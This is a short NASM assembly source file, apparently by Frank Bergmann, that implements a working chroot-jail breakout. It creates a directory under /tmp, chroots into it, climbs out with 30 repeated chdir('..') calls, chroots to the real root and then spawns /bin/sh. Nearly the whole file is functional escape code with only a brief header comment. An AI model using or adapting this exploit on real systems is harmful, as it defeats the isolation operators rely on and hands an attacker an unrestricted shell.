;
; breakout.asm
; simple chroot-breakout
; this asm-Version must be processed by "nasm -f bin" to produce a executable
; Frank Bergmann www.tuxad.com, 03/2011
; 

        %include "lib/elfheader.asm"

_start:

        mov     ebx,tmpdir
        xor     eax,eax
        mov     al,12
        int     0x80      ;chdir()

        mov     ebx,rootdir
        xor     ecx, ecx
        mov     ecx,448
        xor     eax,eax
        mov     al,39
        int     0x80      ;mkdir()

        xor     eax,eax
        mov     al,61
        int     0x80      ;chroot()

        xor     ecx, ecx
        mov     ebx,pardir
updir   xor     eax,eax
        mov     al,12
        int     0x80      ;chdir()
        inc     ecx
        cmp     ecx,30
        jne     updir

        inc     ebx
        xor     eax,eax
        mov     al,61
        int     0x80      ;chroot()

        mov     ecx,sha
        mov     ebx,sh
        xor     edx,edx
        xor     eax,eax
        mov     al,11
        int     0x80      ; execve()

        xor     ebx, ebx  ; return 0
        xor     eax,eax
        inc     eax
        int     0x80      ;_exit()

rootdir db      ",",0
sha     dd      sh
        dd      0
sh      db      "/bin/sh",0
pardir  db      "..",0
tmpdir  db      "/tmp",0

filesize    equ    $ - $$